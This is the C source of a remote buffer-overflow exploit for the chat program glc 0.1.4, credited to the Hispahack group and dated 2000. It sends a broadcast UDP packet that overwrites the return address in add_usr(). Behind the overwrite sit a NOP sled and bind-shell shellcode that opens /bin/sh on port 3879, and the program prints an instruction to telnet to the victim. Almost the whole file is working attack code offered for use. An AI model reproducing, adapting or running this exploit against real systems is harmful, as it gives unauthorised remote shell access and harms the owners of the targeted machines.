/*
 * !Hispahack Research Team 
 * http://hispahack.ccc.de
 *
 * THIS IS !HISPAHACK UNPUBLISHED CODE
 *
 * Linux remote Xploit for glc 0.1.4 at add_usr()
 * 
 * We have to overwrite this  parameters before eip
 *
 *       int new_user = 0; 
 *       gchar info[100];
 *
 * Since we dont have enough space to put our shellcode 
 * before eip we will put it after :)
 *
 *  AAAAAAA.108A..AAAA-RTRTRTRTRT-SHELLCODE
 *                       |-----------^
 *
 * By: Zhodiac <zhodiac@softhome.net>
 *
 * This code is dedicated to the real and only 
 * inspiration i have, my love [CrAsH]] :**
 *
 * #include <standard/disclaimer.h>
 *
 * Madrid, 25/09/2000
 *
 * Spain r0x 
 *
 */

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <stdio.h>
#include <arpa/inet.h>
#include <netdb.h>

#define NUMADDR 8
#define NUMNOPS 120
#define BUFFSIZE 400
#define NOP 0x90
#define OFFSET 0xbffffa34

#define LC_JOIN 107
#define INPORT 16128

/* This shellcode binds a shell at port 3879 thx www.hack.co.za */
char shellcode[]=
 "\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8"
 "\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89"
 "\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x0f\x27\x89\x4d\xf0"
 "\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd"
 "\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9"
 "\xb2\x3f\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x18\x5e\x89\x75"
 "\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08"
 "\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh";

struct cab {
  char cHead[4];
  unsigned char type;
  unsigned int sender;
  unsigned int dest;
  char nick[BUFFSIZE];  
  unsigned char nR;
  unsigned char nG;
  unsigned char nB;
  unsigned char xVal;
  unsigned char cCrypt;
  unsigned char Female;
  unsigned long Reserved1;
  unsigned long Reserved2;
  unsigned long Reserved3;
  char data[4096];
};

void printbanners(void) {

 printf("\nLinux Xploit for glc 0.1.4 by Zhodiac <zhodiac@softhome.net>\n");
 printf("THIS IS !HISPAHACK UNPUBLISHED CODE\nhttp://hispahack.ccc.de\n\n");

 }

void sendstuff(char *buffer) {

 int sock,tmp=1;
 struct sockaddr_in addr;

 sock=socket(PF_INET, SOCK_DGRAM, IPPROTO_UDP);
 setsockopt (sock, SOL_SOCKET, SO_BROADCAST, &tmp, sizeof (int));
 
 memset(&addr,0,sizeof(addr)); 
 addr.sin_family=AF_INET;
 addr.sin_port=htons(INPORT);
 addr.sin_addr.s_addr=INADDR_BROADCAST;
 
 if (sendto(sock,buffer,sizeof(struct cab),0,&addr,sizeof(struct sockaddr_in))<0) {
     fprintf(stderr,"Error Sending datagram message");
     exit(-1);
     }
 
 printf("Successfully sent udp datagram to broadcast (255.255.255.255)\n");
 
 close(sock);

 }

void makebuffer(char *buffer) {
int aux;
struct cab *cabecera;
char *char_ptr;
unsigned long *long_ptr;

 memset(buffer,0,sizeof(buffer));
 cabecera=(struct cab*)buffer;
 cabecera->type=LC_JOIN;
 cabecera->sender=3;
 memset(cabecera->nick,'A',100);
 long_ptr=(unsigned long*)(cabecera->nick+100);
 for (aux=0;aux<NUMADDR;aux++) *(long_ptr++)=OFFSET;
 char_ptr=(char*)long_ptr;
 memset(char_ptr,NOP,NUMNOPS);
 char_ptr+=NUMNOPS;
 memcpy(char_ptr,shellcode,strlen(shellcode));

 }

void main(int argc,char **argv) {

char buffer[8096];

 printbanners();
 makebuffer(buffer);
 sendstuff(buffer);
 
 printf("Now telnet to the victim port 3879 to see if it succeeded :))\n\n");
 
}